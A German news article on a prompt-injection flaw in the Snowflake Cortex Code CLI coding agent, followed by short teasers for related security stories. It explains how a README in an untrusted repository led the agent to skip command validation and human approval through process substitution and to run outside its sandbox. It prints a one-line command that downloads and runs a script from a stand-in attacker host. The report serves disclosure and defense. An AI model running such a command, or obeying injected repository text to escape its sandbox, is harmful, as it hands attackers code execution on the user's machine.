Snowflake Cortex Code CLI-Schwachstelle ermöglichte Sandbox-Escape und Malware-Ausführung

Sicherheitslücken-Details
Das Snowflake Cortex Code CLI ist ein Befehlszeilen-Codierungsagent, der ähnlich wie Claude Code und OpenAI's Codex arbeitet, mit integrierter Funktion zur Ausführung von SQL in Snowflake. Zwei Tage nach der Veröffentlichung wurde eine Sicherheitslücke im Befehlsvalidierungssystem von Cortex Code identifiziert, die speziell konstruierte bösartige Befehle ermöglichte, beliebige Befehle auszuführen, ohne die menschliche Genehmigungsschritte auszulösen, und diese Befehle außerhalb der Sandbox des Cortex CLI auszuführen.
Angriffskette
Der Angriff funktioniert über indirekte Prompt-Injection. Ein Benutzer öffnet Cortex und aktiviert die Sandbox, dann bittet er Cortex um Hilfe mit einem Drittanbieter-Open-Source-Codebasis. Eine in der README eines nicht vertrauenswürdigen Repositorys versteckte Prompt-Injection manipuliert Cortex zu der Annahme, dass es einen gefährlichen Befehl ausführen muss.
Cortex konnte Befehle innerhalb von Prozesssubstitutionsausdrücken nicht validieren, was die nicht genehmigte Ausführung des bösartigen Befehls ermöglichte:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Dieser Befehl lädt ein Skript vom Server eines Angreifers herunter und führt es aus. Die Umgehung funktionierte, weil:
- Unsichere Befehle innerhalb eines Prozesssubstitutions-<()-Ausdrucks nicht vom Validierungssystem ausgewertet wurden
- Der vollständige Befehl mit einem 'sicheren' Befehl begann (in diesem Fall cat)
- Befehle in Prozesssubstitutionsausdrücken niemals menschliche Genehmigung auslösten
Sandbox-Umgehung
Die Prompt-Injection manipuliert auch das Modell, um ein Flag zu setzen, das die Ausführung von Befehlen außerhalb der Sandbox auslöst. Cortex kann standardmäßig ein Flag setzen, um die Ausführung von Befehlen außerhalb der Sandbox auszulösen, und die Injection nutzt dies, um dem bösartigen Befehl zu ermöglichen, außerhalb der Sandbox ausgeführt zu werden.
Behebung
Das Snowflake-Sicherheitsteam validierte und behebt diese Sicherheitslücke und veröffentlichte einen Fix mit Cortex Code CLI Version 1.0.25 am 28. Februar 2026. Die vollständige Empfehlung von Snowflake ist innerhalb der Snowflake Community Site verfügbar unter: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Hinweis: Diese Angriffskette galt auch für Nicht-Sandbox-Benutzer. Die Dokumentation zeigt, dass im OS+Regular-Modus alle Befehle eine Benutzerfreigabe anfordern. Befehle, die in der Sandbox ausgeführt werden, haben auch Netzwerk- und Dateizugriffsbeschränkungen.
📖 Read the full source: HN AI Agents
👀 Siehe auch

MCP-Paketsicherheitsscan deckt weit verbreitete zerstörerische Fähigkeiten ohne Bestätigung auf
Eine Sicherheitsüberprüfung von 2.386 MCP-Paketen auf npm ergab, dass 63,5 % zerstörerische Operationen wie Dateilöschung und Datenbanklöschungen ohne menschliche Bestätigung freigeben. Der Forscher entdeckte, dass insgesamt 49 % Sicherheitsprobleme aufwiesen, mit 402 kritischen und 240 schwerwiegenden Schwachstellen.

RunLobster Hosting Warnung: Bot-Spam und unbefugte Belastungen gemeldet
Ein Reddit-Nutzer berichtet von RunLobster (OpenClaw Hosting)-Bots, die Tech-Subreddits mit Spam überfluten und seine Karte unmittelbar nach der Registrierung mit drei unbefugten Belastungen belasten, ohne dass der Support reagiert.

OpenObscure: Open-Source On-Device Privacy-Firewall für KI-Agenten
OpenObscure ist eine Open-Source-Datenschutz-Firewall auf dem Gerät, die zwischen KI-Agenten und LLM-Anbietern sitzt. Sie verwendet FF1-Format-Erhaltende Verschlüsselung mit AES-256, um PII-Werte zu verschlüsseln, bevor Anfragen Ihr Gerät verlassen, wodurch die Datenstruktur erhalten bleibt und die Privatsphäre geschützt wird.

Datenschutzbedenken bei OpenClaw: Fähigkeiten, SOUL MD und Agentenkommunikation
Ein Entwickler äußert Datenschutzbedenken bezüglich der Architektur von OpenClaw, insbesondere im Hinblick darauf, dass Skills uneingeschränkten Zugriff auf sensible Daten haben, SOUL MD beschreibbar ist und Agenten Informationen ohne Filter teilen.